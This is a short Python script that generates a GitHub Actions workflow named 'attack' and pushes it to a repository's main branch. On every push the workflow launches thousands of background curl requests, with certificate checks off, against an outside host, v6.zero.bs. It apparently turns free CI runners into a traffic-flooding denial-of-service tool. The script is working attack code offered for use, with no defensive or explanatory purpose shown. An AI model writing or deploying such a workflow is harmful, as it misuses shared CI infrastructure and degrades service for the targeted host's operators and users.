#!/usr/bin/env python

import time
import sys
import os
import uuid

unique = str(uuid.uuid4())

now = time.strftime("%Y-%m-%d %H:%M", time.localtime(time.time()))

workflow_dir = ".github/workflows"

atx = "%s/attack-%s.yaml" % (workflow_dir, unique)

if not os.path.isdir(workflow_dir):
  os.makedirs(workflow_dir, exist_ok=True)


with open(atx, "w") as aty:
  aty.write("""name: Loop 100 Times %s

on:
  push:
    branches:
      - main

jobs:
  loop_job:
    runs-on: ubuntu-latest
    steps:
      - name: Run loop 100 times %s
        id: loop_step
        run: |
          counter=0
          max_loops=50
          while [ $counter -lt 100 ]; do
            echo "Running loop iteration $((counter + 1))..."
            curl_loop=0
            while [ $curl_loop -lt $max_loops ]; do
              curl -ks https://v6.zero.bs 2>&1 > /dev/null &
              curl_loop=$((curl_loop + 1))
            done
            echo " [+] started $max_loops processes "
            curl -ks https://v6.zero.bs 2>&1 > /dev/null
            
            counter=$((counter + 1))
          done
          echo ">> DONE!"




""" % (unique, unique))

print("done %s " % atx)

os.system("git add .github/*")
os.system("""git commit -am  "atx commit %s | %s" """ % (now, atx))
os.system("git push origin main")


